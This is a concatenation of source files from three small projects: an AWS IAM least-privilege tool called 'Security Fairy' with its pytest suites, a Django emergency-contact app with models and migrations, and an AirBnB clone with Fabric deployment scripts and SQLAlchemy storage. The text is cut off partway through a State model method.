        item = { "execution_id": { "S": execution_id },
                 "new_policy" : { "S": policy },
                 "entity_arn" : { "S": entity_arn }}
    logger.debug("Updated dynamodb_item: {}".format(item))
    dynamodb_client.put_item(TableName=dynamodb_table, Item=item)
def existing_dynamodb_entry(entity_arn, dynamodb_table):
    """Return any DynamoDB items already stored for this entity ARN."""
    scan_response = SESSION.client('dynamodb').scan(
        TableName=dynamodb_table,
        ScanFilter={'entity_arn': {'AttributeValueList': [{ 'S': entity_arn }],
                                   'ComparisonOperator': 'EQ'}})
    return scan_response.get('Items')
def delete_execution(execution_id, dynamodb_table):
    """Delete the DynamoDB item keyed by this execution id."""
    SESSION.client('dynamodb').delete_item(
        TableName=dynamodb_table,
        Key={ 'execution_id': { 'S': execution_id }})
def get_entity_arn(result_set):
    """Extract the entity ARN from the first result row, normalised to a role ARN."""
    raw_arn = result_set[0][0]['VarCharValue']
    logger.debug(raw_arn)
    entity = AWSEntity(raw_arn)
    entity.convert_assumed_role_to_role()
    return entity
if __name__ == '__main__':
    # Fixed: the original called existing_execution_id_for_role(), which is
    # not defined anywhere in this module and raised NameError on execution.
    # existing_dynamodb_entry() is the surviving lookup helper — confirm the
    # table name matches the deployed environment.
    print(existing_dynamodb_entry('arn:aws:iam::281782457076:role/1s_tear_down_role',
                                  'security_fairy_dynamodb_table'))
    # lambda_handler(
    #     {
    #         "execution_id": "ed3dda30-b1d0-4191-ab88-ce2718b89485"
    #     },
    #     {}
    # )
--- FILE SEPARATOR ---
import sys
sys.path.insert(0,'..')
import logging
import pytest
import json
from aws_iam_policy import IAMPolicy
from aws_iam_policy import IAMStatement
from aws_entity import Arn
logging_level = logging.INFO
# Earlier scratch experiments kept for reference:
# statement = IAMStatement('Allow',["pot:atosoup","goat:cheese"],'*', logging_level = logging_level)
# statement.get_statement()
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_statement(statement)
# print(policy.print_policy())
# print(policy.get_policy())
# arn = Arn('arn:aws:iam::281782457076:role/1s_tear_down_role', logging_level = logging.DEBUG)
# # arn = Arn('arn:aws:iam:us-east-1:842337631775:role/service-role/StatesExecutionRole-us-west-2')
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_action('lambda:Invoke')
# policy.add_action('lambda:Potato20160303')
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# print(policy.print_policy())
# NOTE(review): this ad-hoc Arn exercise runs at import time — i.e. every
# time pytest collects this module — and prints to stdout.
arn = Arn('arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/lanbda-function-name', logging_level = logging.DEBUG)
print(arn.is_role())
print(arn.is_policy())
print(arn.is_assumed_role())
print(arn.get_full_arn())
arn.convert_assumed_role_to_role()
print(arn.get_full_arn())
def test_iam_policy_class():
    """Build an IAMPolicy action-by-action and check its JSON rendering.

    Actions are grouped into one statement per service.  Note the added
    'monitoring:CreateAlarm' is expected back under 'cloudwatch' —
    presumably IAMPolicy normalises the service prefix; confirm in
    aws_iam_policy.
    """
    policy = IAMPolicy(logging_level = logging_level)
    policy.add_action('lambda:Invoke')
    policy.add_action('ec2:RunInstances')
    policy.add_action('ec2:StartInstances')
    policy.add_action('monitoring:CreateAlarm')
    assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
    # policy.add_action('ec2:RunInstances')
    # policy.add_action('ec2:StartInstances')
    # policy.add_action('monitoring:CreateAlarm')
    # assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
--- FILE SEPARATOR ---
"""Security Fairy Tests
This module tests each piece of the Security Fairy tool.
Modules that don't have tests written are in the ``Todo`` section.
Todo:
* API approval
+ Dependency injection:
- test_task_token_*()
- test_api_website_*()
* API endpoint
+ Dependency Injection
- test_invoke_state_machine_*()
* Athena Query
* Revised policy approve
* Revised policy deny
* Revised policy generator
* Variable injection
* Data collection
"""
import sys
sys.path.insert(0,'..')
import pytest
import api_approval as sfaa
import api_endpoint as sfae
import athena_query as sfaq
import revised_policy_approve as sfrpa
import revised_policy_generator as sfrpg
class TestApiApprovalClass(object):
    """Test the api_approval module"""
    def test_none_get_domain(self):
        """Test event['headers'] = None
        Should return the default domain name of testinvocation
        """
        assert sfaa.get_domain({'headers': None}) == 'https://testinvocation/approve'
    def test_aws_get_domain(self):
        """Test 'amazonaws.com' in event['headers']['Host']
        Should return the amazonaws.com domain with the correct requestContext
        """
        # API Gateway hosts embed the deployment stage in the URL path.
        assert sfaa.get_domain(
            {
                'headers': {
                    'Host': 'ezwzmmh526.execute-api.us-east-1.amazonaws.com'
                },
                'requestContext': {
                    'stage': 'Prod'
                }
            }
        ) == 'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com/Prod/'
    def test_get_domain(self):
        """No amazonaws.com in event['headers']['Host']
        Should return the correct domain in the headers stanza
        """
        assert sfaa.get_domain(
            {
                'headers': {
                    'Host': 'ezwzmmh526.execute-api.us-east-1.blah-blah.test'
                }
            }
        ) == 'https://ezwzmmh526.execute-api.us-east-1.blah-blah.test/'
    def test_token_task_approve(self):
        """Test 'approve' in event[pathParameters]['approval']
        Should return json payload with 'body' = 'New policy applied'
        """
        # NOTE(review): uses a captured Step Functions task token — this
        # presumably needs live AWS access or injected dependencies to pass.
        assert sfaa.token_task(
            {
                'pathParameters': {
                    'approval': 'approve'
                },
                'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=","execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'
            }
        ) == {
            'statusCode': 200,
            'headers': {
                'Content-Type': 'application/json'
            },
            'body': 'New policy applied.'
        }
    def test_token_task_deny(self):
        """Test 'deny' in event[pathParameters]['approval']
        Should return json payload with 'body' = 'Revised Policy deleted.'
        """
        assert sfaa.token_task(
            {
                'pathParameters': {
                    'approval': 'deny'
                },
                'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=","execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'
            }
        ) == {
            'statusCode': 200,
            'headers': {
                'Content-Type': 'application/json'
            },
            'body': 'Revised Policy deleted.'
        }
    def test_api_website(self):
        """Test api website"""
        # NOTE(review): the expected value "something" looks like a
        # placeholder — confirm the real rendered payload before relying
        # on this test.
        assert sfaa.api_website({'queryStringParameters': None}) == "something"
class TestApiEndpointClass(object):
    """Class for validating inputs to Security Fairy"""
    # def test_invoke_state_machine(self):
    #     """Test invocation of the state machine"""
    #     assert Hello
    def test_validate_inputs(self):
        """Test num_days < 30 and valid entity_arn
        Should return a json object with correct date window and arn
        """
        # NOTE(review): the expected num_days is -20 for an input of 20 —
        # validate_inputs presumably negates the day count to express a
        # look-back window; confirm against api_endpoint.validate_inputs.
        assert sfae.validate_inputs(
            {
                'body': "{\
                \"entity_arn\":\"arn:aws:sts::281782457076:assumed-role/1S-Admins/alex\",\
                \"num_days\":20\
                }"
            }
        ) == {
            'num_days' : -20,
            'entity_arn': 'arn:aws:sts::281782457076:assumed-role/1S-Admins/alex'
        }
    def test_validate_inputs_big_window(self):
        """Test num_days > 30
        Should raise an invalid date range error
        """
        event = {'body': "{\
                \"entity_arn\":\"arn:aws:sts::281782457076:assumed-role/1S-Admins/alex\",\
                \"num_days\":31\
                }"
                }
        with pytest.raises(ValueError):
            sfae.validate_inputs(event)
    def test_validate_inputs_bad_arn(self):
        """Test for invalid ARN in event['body']
        Should raise an invalid ARN error
        """
        # The ARN below is missing its account-id field, so it is invalid.
        event = {'body':
                "{\
                \"entity_arn\":\"arn:aws:sts::assumed-role/1S-Admins/alex\",\
                \"num_days\":31\
                }"
                }
        with pytest.raises(ValueError):
            sfae.validate_inputs(event)
class TestAthenaQueryClass(object):
    """Class for Athena Query tests"""
    def test_execute_query(self):
        """Test query execution"""
        # NOTE(review): this expects an empty-string result from what looks
        # like a live Athena query against bucket '1s-potato-east' — it
        # presumably needs AWS access or mocking; confirm the expected value
        # is not a placeholder.
        assert sfaq.execute_query(
            "arn:aws:iam::281782457076:assumed-role/1s_tear_down_role",
            "-30",
            "1s-potato-east"
        ) == ''
class TestRevisedPolicyApprove(object):
    """Class for Revised Policy Approve tests"""
    def test_get_revised_policy(self):
        """Test get revised policy"""
        # NOTE(review): empty-string in / empty-string out looks like a
        # placeholder expectation — confirm intended behaviour.
        assert sfrpa.get_revised_policy('') == ''
    def test_get_entity_name_from_arn(self):
        """Test get entity name from arn"""
        # NOTE(review): the expected value 'role' is the resource *type* —
        # confirm the function returns the type rather than the entity
        # name '1s_security_fairy_role'.
        arn = 'arn:aws:iam::281782457076:role/1s_security_fairy_role'
        assert sfrpa.get_entity_name_from_arn(arn) == 'role'
class TestRevisedPolicyGenerator(object):
    """Class for Revised Policy Generator"""
    def test_get_permissions_from_query(self):
        """test get permissions from query function"""
        # Result rows mimic Athena output: a service host followed by a
        # stringified action list.
        result_set = [{'VarCharValue': 'ServiceA.amazonaws.com'},
                      {'VarCharValue': '[testActionOne, testActionTwo]'}
                      ]
        # NOTE(review): "" looks like a placeholder expectation — confirm.
        assert sfrpg.get_permissions_from_query(result_set) == ""
    def test_build_policy_from_query_actions(self):
        """test build policy from query actions"""
        assert sfrpg.build_policy_from_query_actions('') == ''
--- FILE SEPARATOR ---
"""Security Fairy Lambda Handler Tests
This module tests the Lambda functionality of the Security Fairy tool.
Lambda Handlers that don't have tests written are in the ``Todo`` section.
Todo:
* API Approval
+ Dependency Injection
- test_api_approval_*()
* API Endpoint
* Athena Query
* Email approval request
* Get task token
* Revised policy approve
* Revised policy deny
* Revised policy generator
* Variable injection
* Data collection
"""
import sys
sys.path.insert(0,'..')
import pytest
from api_approval import lambda_handler as api_approval
from api_endpoint import lambda_handler as api_endpoint
from athena_query import lambda_handler as athena_query
from email_approval_request import lambda_handler as email_approval_request
from get_task_token import lambda_handler as get_task_token
from revised_policy_approve import lambda_handler as revised_policy_approve
from revised_policy_deny import lambda_handler as revised_policy_deny
from revised_policy_generator import lambda_handler as revised_policy_generator
from variable_injection import lambda_handler as variable_injection
class TestLambdaHandlers(object):
    """Test the Lambda Handler from each module"""
    def test_api_approval_error(self):
        """Test Lambda Handler for api approval"""
        # NOTE(review): embeds a captured Step Functions task token — this
        # presumably needs live AWS access or injected dependencies to pass.
        assert api_approval(
            {
                'httpMethod': 'POST',
                'headers': {
                    'Host': 'ezwzmmh526.execute-api.us-east-1.amazonaws.com'
                },
                'requestContext': {
                    'stage': 'Prod'},
                'pathParameters': {
                    'approval': 'deny'},
                'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=",\
                "execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'},
            '') == {
                "statusCode": 200,
                "headers": {
                    "Content-Type":"application/json"},
                "body": ""
            }
    def test_api_endpoint_invoke_error(self):
        """Test Default API response
        Should return 'Unsuccessful: state_machine' as the default response
        """
        assert api_endpoint(
            {
                'body': "{\"entity_arn\":\"arn:aws:sts::281782457076:role/1S-Admins\",\
                \"num_days\":30}"
            },
            {}
        ) == {
            'body': "Unsuccessful:\n 'state_machine'",
            'headers': {
                'Content-Type': 'application/json'
            },
            'statusCode': 500
        }
    def test_athena_query(self):
        """Test Athena Query"""
        # NOTE(review): the empty-string expectations below look like
        # placeholders relying on live AWS calls — confirm intent.
        assert athena_query({}, {}) == ""
    def test_email_approval_request(self):
        """Test email approval request"""
        assert email_approval_request({}, {}) == ""
    def test_get_task_token(self):
        """Test get task token"""
        assert get_task_token({}, {}) == ""
    def test_revised_policy_approve(self):
        """Test revised policy approve"""
        assert revised_policy_approve({}, {}) == ""
    def test_revised_policy_deny(self):
        """Test revised policy deny"""
        assert revised_policy_deny({}, {}) == ""
    def test_revised_policy_generator(self):
        """Test revised policy generator rejects a missing execution_id"""
        with pytest.raises(ValueError):
            revised_policy_generator({'execution_id': None}, {})
    def test_variable_injection(self):
        """Test variable injection"""
        assert variable_injection({}, {}) == ''
--- FILE SEPARATOR ---
"""Variable Injection
Creates the environment variables used
by subsequent Lambda functions in the
Security Fairy Step Functions Task.
"""
import os
import boto3
def lambda_handler(event, context):
    """Executed by the Lambda service.

    Looks up this function's own configured environment variables through
    the Lambda API and merges them into *event*, which is returned for
    the next Step Functions state.
    """
    function_name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
    function_version = os.environ['AWS_LAMBDA_FUNCTION_VERSION']
    client = boto3.client('lambda', region_name=os.environ['AWS_REGION'])
    configuration = client.get_function(FunctionName=function_name,
                                        Qualifier=function_version)
    env_vars = configuration['Configuration']['Environment']['Variables']
    event.update(env_vars)
    return event
|
[
"/api_approval.py",
"/api_endpoint.py",
"/athena_query.py",
"/aws_api_tools.py",
"/aws_iam_policy.py",
"/aws_session_manager.py",
"/build_cloudtrail_table.py",
"/denied_notification.py",
"/email_approval_request.py",
"/get_task_token.py",
"/partition_cloudtrail_bucket.py",
"/revert.py",
"/revised_policy_approve.py",
"/revised_policy_deny.py",
"/revised_policy_generator.py",
"/tests/test_classes.py",
"/tests/test_general.py",
"/tests/test_lambda_handlers.py",
"/variable_injection.py"
] |
01DEEKSHA/Rescue
|
from django.contrib import admin
from .models import contact,SlideShowItem
# Register your models here.
# Expose the contact and SlideShowItem models in the Django admin site.
admin.site.register(contact)
# Registered the model
admin.site.register(SlideShowItem)
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 13:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (creates Login and SlideShowItem) —
    # do not hand-edit; add a new migration for further schema changes.
    dependencies = [
        ('main_app', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Login',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Username_or_Email', models.CharField(max_length=100)),
                ('password', models.CharField(max_length=32)),
            ],
        ),
        migrations.CreateModel(
            name='SlideShowItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, verbose_name='Name')),
                ('image', models.ImageField(upload_to='Images/slideshow')),
                ('content', models.CharField(max_length=200, verbose_name='Enter content only upto 200 characters')),
                ('read_more', models.CharField(max_length=1000, verbose_name='Add a read more link to related article')),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 14:07
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration — do not hand-edit.
    # NOTE(review): the storage location is a one-element tuple and a
    # developer-specific absolute path; the following migration (0005)
    # corrects the tuple, but the hard-coded path remains non-portable.
    dependencies = [
        ('main_app', '0003_auto_20210330_1351'),
    ]
    operations = [
        migrations.AlterField(
            model_name='slideshowitem',
            name='image',
            field=models.ImageField(storage=django.core.files.storage.FileSystemStorage(location=('/Users/nikhilmankani/Downloads/Rescue/main_app/static',)), upload_to='Images/slideshow'),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 14:08
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration — do not hand-edit.
    # NOTE(review): the storage location is a developer-specific absolute
    # path, so this migration is not portable across machines.
    dependencies = [
        ('main_app', '0004_auto_20210330_1407'),
    ]
    operations = [
        migrations.AlterField(
            model_name='slideshowitem',
            name='image',
            field=models.ImageField(storage=django.core.files.storage.FileSystemStorage(location='/Users/nikhilmankani/Downloads/Rescue/main_app/static'), upload_to='Images/slideshow'),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from django.core.files.storage import FileSystemStorage
# Pointer to the Filesystem where we store our static files
# (first entry of settings.STATICFILES_DIRS), used by SlideShowItem.image.
fs = FileSystemStorage(location=settings.STATICFILES_DIRS[0])
# Create your models here.
class contact(models.Model):
    # Emergency-contact record linked to a User (nullable, cascade delete).
    # NOTE(review): class name breaks the PascalCase convention; renaming
    # requires a migration, so it is only flagged here.
    user = models.ForeignKey(User, on_delete=models.CASCADE,related_name="contact", null=True)
    name = models.CharField(max_length=100)
    email = models.EmailField()
    mobile_no = models.CharField(max_length=15)
    # Constants backing the `relation` choices below.
    Father = 'Father'
    Mother = 'Mother'
    Brother = 'Brother'
    Sister = 'Sister'
    Husband = 'Husband'
    Friend = 'Friend'
    Relative = 'Relative'
    Other = 'Other'
    relations = (
        (Father, 'Father'),
        (Mother, 'Mother'),
        (Brother, 'Brother'),
        (Sister, 'Sister'),
        (Husband, 'Husband'),
        (Friend, 'Friend'),
        (Relative, 'Relative'),
        (Other, 'Other'),
    )
    relation = models.CharField(max_length=10, choices=relations, default=Other)
    def __str__(self):
        # Admin/display representation: the contact's name.
        return self.name
class Login(models.Model):
    # NOTE(review): this model stores the password as plain text in a
    # CharField — a security risk.  Prefer django.contrib.auth's hashed
    # password handling; confirm whether this model is actually used.
    Username_or_Email= models.CharField(max_length=100)
    password = models.CharField(max_length=32)
# Model to create the items for slideshow
class SlideShowItem(models.Model):
    # One slide of the homepage slideshow: image, short caption and a
    # read-more link.  Images are written through the `fs` static storage.
    name = models.CharField(verbose_name="Name",max_length=30)
    image = models.ImageField(upload_to="Images/slideshow",storage=fs)
    content = models.CharField(verbose_name="Enter content only upto 200 characters",max_length=200)
    read_more = models.CharField(verbose_name="Add a read more link to related article",max_length=1000)
    def __str__(self):
        # Admin/display representation: the slide's name.
        return self.name
|
[
"/main_app/admin.py",
"/main_app/migrations/0002_login_slideshowitem.py",
"/main_app/migrations/0004_auto_20210330_1407.py",
"/main_app/migrations/0005_auto_20210330_1408.py",
"/main_app/models.py"
] |
01Eddie/AirBnB_clone_v2
|
#!/usr/bin/python3
"""Fabric script that generates a .tgz archive from the contents of the
web_static"""
import fabric
from fabric.api import local
from datetime import datetime
def do_pack():
    """Create a .tgz archive of the web_static folder.

    The archive is written to versions/web_static_<timestamp>.tgz; the
    versions folder is created if it does not exist.

    Returns:
        The archive path on success, None on any failure.
    """
    try:
        timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
        archive_path = "versions/web_static_{}.tgz".format(timestamp)
        local("sudo mkdir -p versions")
        local("sudo tar -czvf {} web_static".format(archive_path))
        return archive_path
    except Exception:
        return None
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""Fabric script (based on the file 1-pack_web_static.py) that distributes an
archive to your web servers"""
import fabric
from fabric.api import *
from datetime import datetime
from os import path
# Deployment targets and SSH user used by all Fabric remote commands below.
env.hosts = ['35.237.172.160', '35.237.222.103']
env.user = 'ubuntu'
def do_deploy(archive_path):
    """Distribute an archive to the web servers and activate it.

    Steps (run on every host in env.hosts):
      * upload the archive to /tmp/
      * unpack it into /data/web_static/releases/<name>/
      * flatten the inner web_static/ folder into the release directory
      * repoint the /data/web_static/current symlink at the new release

    Returns:
        True when every operation succeeds, False otherwise (including
        when archive_path does not exist locally).
    """
    if not path.exists(archive_path):
        return False
    try:
        archive_name = archive_path.split('/')[-1]
        release_name = archive_name.replace('.tgz', '')
        release_dir = "/data/web_static/releases/" + release_name
        put(archive_path, "/tmp/")
        run("sudo mkdir -p " + release_dir)
        # Bug fix: extract into the release directory itself — the original
        # extracted into releases/ and then tried to move files out of a
        # <release>/web_static/ path that was never created.
        run("sudo tar -xzvf /tmp/" + archive_name + " -C " + release_dir)
        run("sudo rm -rf /tmp/" + archive_name)
        run("sudo mv " + release_dir + "/web_static/* " + release_dir + "/")
        run("sudo rm -rf " + release_dir + "/web_static")
        run("sudo rm -rf /data/web_static/current")
        # Bug fix: link `current` to the new release, not to releases/.
        run("sudo ln -sf " + release_dir + " /data/web_static/current")
        return True
    except Exception:
        return False
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""Fabric script (based on the file 2-do_deploy_web_static.py) that creates and
distributes an archive to your web servers:"""
import fabric
from fabric.api import local, env, put, run
from datetime import datetime
from os import path
env.hosts = ['35.237.172.160', '35.237.222.103']
def deploy():
    """Create a web_static archive and deploy it to both web servers.

    Calls do_pack() to build the archive; returns False when packing
    fails, otherwise returns do_deploy()'s result.

    All remote commands run on every host in env.hosts.
    """
    # Bug fix: the original called do_deploy() with no argument here,
    # which raised TypeError before any deployment could happen — the
    # archive must come from do_pack().
    archive = do_pack()
    if archive is None:
        return False
    return do_deploy(archive)
def do_deploy(archive_path):
    """Upload archive_path to the web servers and activate the release.

    Steps (run on every host in env.hosts):
      * upload the archive to /tmp/
      * unpack it (stripping the leading web_static/ component) into
        /data/web_static/releases/<archive name without .tgz>/
      * delete the uploaded archive and repoint /data/web_static/current

    Returns:
        True when all remote operations succeed, False otherwise
        (including when archive_path does not exist locally).
    """
    if not path.exists(archive_path):
        return False
    try:
        # Derive names from the path itself instead of the original's
        # brittle archive_path[9:] slice (which assumed a "versions/"
        # prefix of exactly 9 characters).
        archive_name = archive_path.split('/')[-1]
        release_name = archive_name[:-4]
        release_dir = "/data/web_static/releases/" + release_name
        # Bug fix: upload to /tmp/ — the original uploaded to /temp/ but
        # then extracted from /tmp/, so deployment always failed.
        put(archive_path, "/tmp/" + archive_name)
        run("mkdir -p " + release_dir)
        run("tar -xzvf /tmp/" + archive_name + " -C " + release_dir
            + " --strip-components=1")
        run("rm -rf /tmp/" + archive_name)
        run("rm -rf /data/web_static/current")
        # Bug fix: the original concatenated the release dir and the link
        # target without a space, producing a single bogus ln argument.
        run("sudo ln -sf " + release_dir + " /data/web_static/current")
        return True
    except Exception:
        return False
def do_pack():
    """Create a .tgz archive of the web_static folder.

    The archive lands in versions/web_static_<timestamp>.tgz; the
    versions folder is created if missing.

    Returns:
        The archive path on success, None on any failure.
    """
    try:
        stamp = datetime.now().strftime("%Y%m%d%H%M%S")
        archive_path = "versions/web_static_{}.tgz".format(stamp)
        local("sudo mkdir -p versions")
        local("sudo tar -cvzf {} web_static". format(archive_path))
        return archive_path
    except Exception:
        return None
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""This module instantiates an object of class FileStorage"""
import models
from models.amenity import Amenity
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.place import Place
from models.review import Review
from os import getenv
""" Add a conditional depending of the value of the environment variable
HBNB_TYPE_STORAGE:
If equal to db:
Import DBStorage class in this file
Create an instance of DBStorage and store it in the variable storage (the line
storage.reload() should be executed after this instantiation)
Else:
Import FileStorage class in this file
Create an instance of FileStorage and store it in the variable storage (the
line storage.reload() should be executed after this instantiation) """
# Select the storage engine at import time from HBNB_TYPE_STORAGE:
# 'db' -> SQLAlchemy-backed DBStorage; anything else -> JSON FileStorage.
if getenv('HBNB_TYPE_STORAGE') == 'db':
    from models.engine.db_storage import DBStorage
    storage = DBStorage()
else:
    from models.engine.file_storage import FileStorage
    storage = FileStorage()
# Populate the shared `storage` singleton from the persisted data.
storage.reload()
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""DB_storage engine"""
import unittest
from os import getenv
from models.base_model import Base
from models.user import User
from models.state import State
from models.city import City
from models.place import Place
from models.review import Review
from models.amenity import Amenity
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import create_engine
class DBStorage:
    '''DBStorage class: MySQL-backed storage engine using SQLAlchemy.'''
    __engine = None
    __session = None

    def __init__(self):
        '''Create a new instance '''
        # Connection settings come from the HBNB_MYSQL_* environment
        # variables; pool_pre_ping drops stale connections transparently.
        self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'
                                      .format(getenv('HBNB_MYSQL_USER'),
                                              getenv('HBNB_MYSQL_PWD'),
                                              getenv('HBNB_MYSQL_HOST'),
                                              getenv('HBNB_MYSQL_DB')),
                                      pool_pre_ping=True)
        # The test environment always starts from an empty schema.
        if getenv('HBNB_ENV') == 'test':
            Base.metadata.drop_all(self.__engine)

    def all(self, cls=None):
        """query on database session

        Returns a dict mapping '<ClassName>.<id>' to each object, for the
        given model class or (when cls is None) for every mapped class.
        """
        if not cls:
            # Bug fix: SQLAlchemy Query objects have no .extend() method,
            # so the original code raised AttributeError whenever cls was
            # omitted.  Accumulate results in a plain list instead.
            res_list = []
            for model in (Amenity, City, Place, Review, State, User):
                res_list.extend(self.__session.query(model))
        else:
            res_list = self.__session.query(cls)
        return {'{}.{}'.format(type(obj).__name__, obj.id): obj
                for obj in res_list}

    def new(self, obj):
        """ add object to the current database session """
        self.__session.add(obj)

    def save(self):
        """ Commit all changes of the current db session """
        self.__session.commit()

    def delete(self, obj=None):
        """ delete from the current db session """
        if obj:
            self.__session.delete(obj)

    def reload(self):
        """ create tables in db and create db session """
        Base.metadata.create_all(self.__engine)
        # expire_on_commit=False keeps objects usable after commit;
        # scoped_session makes the session thread-local.
        session_factory = sessionmaker(bind=self.__engine,
                                       expire_on_commit=False)
        self.__session = scoped_session(session_factory)

    def close(self):
        """ call remove() method on the private session attribute """
        return self.__session.remove()
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" State Module for HBNB project """
from models.base_model import BaseModel, Base
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import relationship
from models.city import City
import models
from os import getenv
class State(BaseModel, Base):
    """ State class """
    # Attribute set is chosen at import time from HBNB_TYPE_STORAGE:
    # mapped SQLAlchemy columns for the DB engine, plain attributes plus a
    # computed `cities` property for FileStorage.
    if getenv('HBNB_TYPE_STORAGE') == 'db':
        __tablename__ = 'states'
        name = Column(String(128), nullable=False)
        cities = relationship('City', cascade='delete', backref='state')
    else:
        name = ""
    """ If your storage engine is not DBStorage, add a public getter method cities to return the list of City objects from storage linked to the current State """
    if getenv('HBNB_TYPE_STORAGE') != 'db':
        @property
        def cities(self):
